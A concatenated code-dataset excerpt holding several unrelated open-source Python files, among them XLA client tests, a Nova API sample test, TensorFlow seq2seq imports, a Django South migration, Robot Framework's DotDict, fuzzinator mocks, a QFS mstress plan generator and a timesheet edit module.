c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1), window_strides=(1, 1),
padding=xla_client.PaddingType.SAME)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.], [4., 5., 6.]])
def testReduceWindowValidGeneralStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1), window_strides=(1, 2),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 9.]])
def testReduceWindowValidUnitStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1), window_strides=(1, 1),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.]])
def testReduceWindowSameUnitStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1), window_strides=(1, 1),
padding=xla_client.PaddingType.SAME)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.], [4., 5., 6.]])
def testReduceWindowValidGeneralStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1), window_strides=(1, 2),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 9.]])
def testWhileF32(self):
cond = self._CreateTestF32Lt10Computation()
body = self._CreateMulF32By2Computation()
c = self._NewComputation()
init = c.ConstantF32Scalar(1.)
c.While(cond, body, init)
self._ExecuteAndCompareClose(c, expected=16.)
def testWhileF64(self):
cond = self._CreateTestF64Lt10Computation()
body = self._CreateMulF64By2Computation()
c = self._NewComputation()
init = c.ConstantF64Scalar(1.)
c.While(cond, body, init)
self._ExecuteAndCompareClose(c, expected=16.)
def testConditionalTrue(self):
c = self._NewComputation()
pred = c.ConstantPredScalar(True)
true_operand = c.ConstantF32Scalar(3.)
true_computation = self._CreateMulF32By2Computation()
false_operand = c.ConstantF32Scalar(2.)
false_computation = self._CreateConstantF32Computation()
c.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=6.)
def testConditionalFalse(self):
c = self._NewComputation()
pred = c.ConstantPredScalar(False)
true_operand = c.ConstantF32Scalar(3.)
true_computation = self._CreateMulF32By2Computation()
false_operand = c.ConstantF32Scalar(2.)
false_computation = self._CreateConstantF32Computation()
c.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=1.)
def testInfeedS32Values(self):
to_infeed = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
c.Infeed(xla_client.Shape.from_pyval(to_infeed[0]))
compiled_c = c.Build().CompileWithExampleArguments()
for item in to_infeed:
xla_client.transfer_to_infeed(item)
for item in to_infeed:
result = compiled_c.Execute()
self.assertEqual(result, item)
def testInfeedThenOutfeedS32(self):
to_round_trip = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
x = c.Infeed(xla_client.Shape.from_pyval(to_round_trip[0]))
c.Outfeed(x)
compiled_c = c.Build().CompileWithExampleArguments()
for want in to_round_trip:
execution = threading.Thread(target=compiled_c.Execute)
execution.start()
xla_client.transfer_to_infeed(want)
got = xla_client.transfer_from_outfeed(
xla_client.Shape.from_pyval(to_round_trip[0]))
execution.join()
self.assertEqual(want, got)
class ErrorTest(LocalComputationTest):
def setUp(self):
self.f32_scalar_2 = NumpyArrayF32(2.0)
self.s32_scalar_2 = NumpyArrayS32(2)
def testInvokeWithWrongElementType(self):
c = self._NewComputation()
c.SetOpMetadata(xla_client.CurrentSourceInfoMetadata())
c.ParameterFromNumpy(self.s32_scalar_2)
c.ClearOpMetadata()
self.assertRaisesRegexp(
RuntimeError, r"Invalid argument shape.*xla_client_test.py.*"
r"expected s32\[\], got f32\[\]",
lambda: c.Build().CompileWithExampleArguments([self.f32_scalar_2]))
if __name__ == "__main__":
unittest.main()
| apache-2.0 | -1,995,081,424,407,314,200 | 37.470154 | 80 | 0.625028 | false |
mahak/nova | nova/tests/functional/api_sample_tests/test_flavor_extraspecs.py | 4 | 2640 | # Copyright 2012 Nebula, Inc.
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova.tests.functional.api_sample_tests import api_sample_base
class FlavorExtraSpecsSampleJsonTests(api_sample_base.ApiSampleTestBaseV21):
ADMIN_API = True
sample_dir = 'flavor-extra-specs'
def _flavor_extra_specs_create(self):
subs = {
'value1': 'shared',
'value2': '1',
}
response = self._do_post('flavors/1/os-extra_specs',
'flavor-extra-specs-create-req', subs)
self._verify_response('flavor-extra-specs-create-resp',
subs, response, 200)
def test_flavor_extra_specs_get(self):
subs = {
'value1': '1',
}
self._flavor_extra_specs_create()
response = self._do_get('flavors/1/os-extra_specs/hw:numa_nodes')
self._verify_response('flavor-extra-specs-get-resp',
subs, response, 200)
def test_flavor_extra_specs_list(self):
subs = {
'value1': 'shared',
'value2': '1',
}
self._flavor_extra_specs_create()
response = self._do_get('flavors/1/os-extra_specs')
self._verify_response('flavor-extra-specs-list-resp',
subs, response, 200)
def test_flavor_extra_specs_create(self):
self._flavor_extra_specs_create()
def test_flavor_extra_specs_update(self):
subs = {
'value1': '2',
}
self._flavor_extra_specs_create()
response = self._do_put('flavors/1/os-extra_specs/hw:numa_nodes',
'flavor-extra-specs-update-req', subs)
self._verify_response('flavor-extra-specs-update-resp',
subs, response, 200)
def test_flavor_extra_specs_delete(self):
self._flavor_extra_specs_create()
response = self._do_delete('flavors/1/os-extra_specs/hw:numa_nodes')
self.assertEqual(200, response.status_code)
self.assertEqual('', response.text)
| apache-2.0 | 5,747,813,114,677,206,000 | 37.26087 | 78 | 0.598864 | false |
manazhao/tf_recsys | tensorflow/contrib/seq2seq/__init__.py | 15 | 2363 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Ops for building neural network seq2seq decoders and losses.
See the @{$python/contrib.seq2seq} guide.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=unused-import,wildcard-import,line-too-long
from tensorflow.contrib.seq2seq.python.ops.attention_wrapper import *
from tensorflow.contrib.seq2seq.python.ops.basic_decoder import *
from tensorflow.contrib.seq2seq.python.ops.beam_search_decoder import *
from tensorflow.contrib.seq2seq.python.ops.beam_search_ops import *
from tensorflow.contrib.seq2seq.python.ops.decoder import *
from tensorflow.contrib.seq2seq.python.ops.helper import *
from tensorflow.contrib.seq2seq.python.ops.loss import *
from tensorflow.python.util.all_util import remove_undocumented
# pylint: enable=unused-import,widcard-import,line-too-long
_allowed_symbols = [
"sequence_loss",
"Decoder",
"dynamic_decode",
"BasicDecoder",
"BasicDecoderOutput",
"BeamSearchDecoder",
"BeamSearchDecoderOutput",
"BeamSearchDecoderState",
"Helper",
"CustomHelper",
"FinalBeamSearchDecoderOutput",
"gather_tree",
"GreedyEmbeddingHelper",
"SampleEmbeddingHelper",
"ScheduledEmbeddingTrainingHelper",
"ScheduledOutputTrainingHelper",
"TrainingHelper",
"BahdanauAttention",
"LuongAttention",
"hardmax",
"AttentionWrapperState",
"AttentionWrapper",
"AttentionMechanism",
"tile_batch",
"safe_cumprod",
"monotonic_attention",
"monotonic_probability_fn",
"BahdanauMonotonicAttention",
"LuongMonotonicAttention",
]
remove_undocumented(__name__, _allowed_symbols)
| apache-2.0 | 5,054,603,284,321,872,000 | 33.246377 | 80 | 0.723233 | false |
ehealthafrica-ci/formhub | odk_logger/migrations/0015_auto__add_field_xform_is_crowd_form.py | 7 | 7432 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'XForm.is_crowd_form'
db.add_column('odk_logger_xform', 'is_crowd_form', self.gf('django.db.models.fields.BooleanField')(default=False), keep_default=False)
def backwards(self, orm):
# Deleting field 'XForm.is_crowd_form'
db.delete_column('odk_logger_xform', 'is_crowd_form')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'odk_logger.attachment': {
'Meta': {'object_name': 'Attachment'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'instance': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'attachments'", 'to': "orm['odk_logger.Instance']"}),
'media_file': ('django.db.models.fields.files.FileField', [], {'max_length': '100'})
},
'odk_logger.instance': {
'Meta': {'object_name': 'Instance'},
'date': ('django.db.models.fields.DateField', [], {'null': 'True'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date_modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'start_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "u'submitted_via_web'", 'max_length': '20'}),
'survey_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['odk_logger.SurveyType']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'surveys'", 'null': 'True', 'to': "orm['auth.User']"}),
'uuid': ('django.db.models.fields.CharField', [], {'default': "u''", 'max_length': '32'}),
'xform': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'surveys'", 'null': 'True', 'to': "orm['odk_logger.XForm']"}),
'xml': ('django.db.models.fields.TextField', [], {})
},
'odk_logger.surveytype': {
'Meta': {'object_name': 'SurveyType'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'odk_logger.xform': {
'Meta': {'ordering': "('id_string',)", 'unique_together': "(('user', 'id_string'),)", 'object_name': 'XForm'},
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date_modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'default': "u''", 'null': 'True'}),
'downloadable': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'has_start_time': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'id_string': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'db_index': 'True'}),
'is_crowd_form': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'json': ('django.db.models.fields.TextField', [], {'default': "u''"}),
'shared': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'shared_data': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'xforms'", 'null': 'True', 'to': "orm['auth.User']"}),
'uuid': ('django.db.models.fields.CharField', [], {'default': "u''", 'max_length': '32'}),
'xls': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True'}),
'xml': ('django.db.models.fields.TextField', [], {})
}
}
complete_apps = ['odk_logger']
| bsd-2-clause | -5,078,787,693,243,298,000 | 70.461538 | 182 | 0.549381 | false |
synsun/robotframework | src/robot/utils/dotdict.py | 3 | 1574 | # Copyright 2008-2015 Nokia Solutions and Networks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
try:
from collections import OrderedDict
except ImportError: # New in Python 2.7
from .ordereddict import OrderedDict
class DotDict(OrderedDict):
def __getattr__(self, key):
try:
return self[key]
except KeyError:
raise AttributeError(key)
def __setattr__(self, key, value):
if not key.startswith('_OrderedDict__'):
self[key] = value
else:
OrderedDict.__setattr__(self, key, value)
def __delattr__(self, key):
try:
self.pop(key)
except KeyError:
OrderedDict.__delattr__(self, key)
def __eq__(self, other):
return dict.__eq__(self, other)
def __ne__(self, other):
return not self == other
def __str__(self):
return '{%s}' % ', '.join('%r: %r' % (key, self[key]) for key in self)
# Must use original dict.__repr__ to allow customising PrettyPrinter.
__repr__ = dict.__repr__
| apache-2.0 | 4,890,827,775,549,104,000 | 29.862745 | 78 | 0.629606 | false |
renatahodovan/fuzzinator | tests/call/common_call.py | 2 | 1286 | # Copyright (c) 2016 Renata Hodovan, Akos Kiss.
#
# Licensed under the BSD 3-Clause License
# <LICENSE.rst or https://opensource.org/licenses/BSD-3-Clause>.
# This file may not be copied, modified, or distributed except
# according to those terms.
import os
blinesep = str.encode(os.linesep)
resources_dir = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), 'resources')
def mock_always_fail_call(**kwargs):
"""
Unconditionally return an issue dictionary composed of all the keyword
arguments of the function.
"""
return dict(kwargs)
def mock_never_fail_call(**kwargs):
"""
Unconditionally return ``None`` signaling no issue.
"""
return None
class MockAlwaysFailCall(object):
"""
Unconditionally return an issue dictionary composed of all the keyword
arguments of the constructor and the call.
"""
def __init__(self, **kwargs):
self.init_kwargs = kwargs
def __call__(self, **kwargs):
issue = dict(self.init_kwargs)
issue.update(kwargs)
return issue
class MockNeverFailCall(object):
"""
Unconditionally return ``None`` signaling no issue.
"""
def __init__(self, **kwargs):
pass
def __call__(self, **kwargs):
return None
| bsd-3-clause | -8,797,606,947,158,945,000 | 22.814815 | 102 | 0.656299 | false |
qnu/qfs | benchmarks/mstress/mstress_plan.py | 5 | 6319 | #!/usr/bin/env python
# $Id$
#
# Author: Thilee Subramaniam
#
# Copyright 2012 Quantcast Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy
# of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# This code is used to generate a plan file for metaserver vs namenode
# benchmarking.
#
import optparse
import sys
import subprocess
import time
import os
import math
import getpass
"""
This program is used to create the directory/file layout to be used
in metaserver/namenode stress test.
You basically specify the depth of the directory tree and the number
of elements (files or directories) per level, along with the list of
client-hosts you want to use and the number of clients per client-host
that you want to use.
This script will generate the plan file, and copy it to the /tmp on the
given list of client hosts.
Thereafter, you can execute the mstress.py with this plan file.
"""
class Globals:
PATH_PREFIX = 'Dir_'
PLAN_OUTPUT = './planfile.txt'
def ParseCommandline():
epi = ('Example: "%s -c h1,h2 -n 3 -l 4 -i 3 -s 100" would create 4 levels of 3 inodes ' % sys.argv[0] +
'(3+9+27+81=120) per client process. Since there are 3 ' +
'processes on 2 hosts, we create 120x6=720 inodes. We will attempt ' +
'to stat 100 random leaf paths using all client processes. We will do a readdir ' +
'all through the directory tree.')
parser = optparse.OptionParser(epilog=epi)
parser.add_option('-c', '--client-hosts',
action='store',
default='localhost',
type='string',
help='Comma-separated list of client host names.')
parser.add_option('-n', '--clients-per-host',
action='store',
default=1,
type='int',
help='Number of clients per client host.')
parser.add_option('-l', '--levels',
action='store',
default=1,
type='int',
help='File-tree depth on each client.')
parser.add_option('-i', '--inodes-per-level',
action='store',
default=100,
type='int',
help='Inodes per each level on each client.')
parser.add_option('-t', '--path-type',
action='store',
default='dir',
type='string',
help='Whether to create "dir" or "file" inodes.')
parser.add_option('-s', '--num-to-stat',
action='store',
default=100,
type='int',
help='Number of inodes to stat (<=total leaf inodes).')
parser.add_option('-o', '--output-file',
action='store',
default=None,
type='string',
help='Output plan file.')
opts, args = parser.parse_args()
if args:
sys.exit('Unexpected arguments: %s.' % str(args))
if opts.output_file is None:
opts.output_file = '/tmp/mstress_%s_%s.plan' % (getpass.getuser(), time.strftime("%F-%H-%M-%S", time.gmtime()))
return opts
def main():
opts = ParseCommandline()
hostlist = opts.client_hosts.split(',')
numClientProcesses = float(len(hostlist) * opts.clients_per_host)
if numClientProcesses == 0.0:
sys.exit('Invalid client processes')
#get the smallest number larger than 'opts.num_to_stat' that is a multiple of opts.num_to_stat
statPerClient = int(math.ceil(float(opts.num_to_stat) / numClientProcesses))
#print opts
outfile = open(opts.output_file, 'w')
outfile.write('# *** DO NOT EDIT THIS FILE BY HAND *** \n# USE mstress_plan.py TO MODIFY INSTEAD\n#\n')
outfile.write('#List of hosts taking part in the plan\nhostslist=%s\n' % opts.client_hosts)
outfile.write('#Number of mstress cliends per client host\nclientsperhost=%d\n' % opts.clients_per_host)
outfile.write('#File or directory\ntype=%s\n' % opts.path_type)
outfile.write('#Number of levels in created tree\nlevels=%d\n' % opts.levels)
outfile.write('#Number of inodes per level\ninodes=%d\n' % opts.inodes_per_level)
outfile.write('#Number of random paths to stat, per client\nnstat=%d\n' % statPerClient)
""" old code
begin_tree_delta = 0
for level in range(0,opts.levels):
begin_tree_delta = begin_tree_delta + pow(opts.inodes_per_level, level + 1)
#print "delta = ", begin_tree_delta
outfile.write('#host\tclient\tlevel\tdistribution\n')
begin_tree_idx = 0
for host_no in range(0,len(hostlist)):
host = hostlist[host_no]
for client_no in range(0,opts.clients_per_host):
# tree for this level
begin_idx = begin_tree_idx
for level in range(0,opts.levels):
prefix = '%s\tproc_%02d\t%d\t' % (host, client_no, level)
# print '-- h=%d, c=%d level=%d, begin idx = %d' % (host_no, client_no, level, begin_idx)
suffix = ''
for ranges in range(0, pow(opts.inodes_per_level, level)):
if len(suffix) != 0:
suffix = suffix + ','
suffix = suffix + '%d-%d'%(begin_idx, begin_idx + opts.inodes_per_level - 1)
begin_idx = begin_idx + opts.inodes_per_level
outfile.write('%s\t%s\n' % (prefix, suffix))
begin_tree_idx = begin_tree_idx + begin_tree_delta
#print "next begin tree idx = ", begin_tree_idx
"""
outfile.close()
print '==> Created planfile: %s' % opts.output_file
print 'copying file %s to all client hosts' % opts.output_file
for client in hostlist:
p = subprocess.Popen(['/usr/bin/scp', os.path.abspath(opts.output_file), '%s:%s' % (client, opts.output_file)])
while 1:
ret = p.poll()
if ret == None:
time.sleep(0.5)
else:
print 'transfered %s to %s' % (opts.output_file, client)
break
if __name__ == '__main__':
main()
| apache-2.0 | -6,966,773,101,635,962,000 | 36.390533 | 115 | 0.614021 | false |
arivarton/workhours | stamp/edit.py | 1 | 1477 | import sys
import re
__all__ = ['edit_workday',
'edit_customer',
'edit_project',
'edit_invoice']
def edit_workday(args):
workday = args.db.get('Workday', args.id)
if args.comment:
workday.comment = args.comment
if args.customer:
workday.customer = args.customer
if args.project:
workday.project = args.db.get_project(args.project)
return workday
def edit_customer(db, id, name=None, contact=None, org_nr=None, address=None,
zip_code=None, mail=None, phone=None):
customer = db.get('Customer', id)
if name:
customer.name = name
if contact:
customer.contact = contact
if org_nr:
customer.org_nr = org_nr
if address:
customer.address = address
if zip_code:
customer.zip_code = zip_code
if mail:
customer.mail = mail
if phone:
customer.phone = mail
return customer
def edit_project(db, id, name=None, link=None):
project = db.get('Project', id)
if name:
project.name = name
if link:
project.link = link
return project
def edit_invoice(db, id, paid=False, sent=False):
invoice = db.get('Invoice', id)
if paid:
if invoice.paid:
invoice.paid = False
else:
invoice.paid = True
if sent:
if invoice.sent:
invoice.sent = False
else:
invoice.sent = True
return invoice
| gpl-3.0 | -1,168,086,392,038,541,600 | 24.465517 | 77 | 0.578876 | false |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.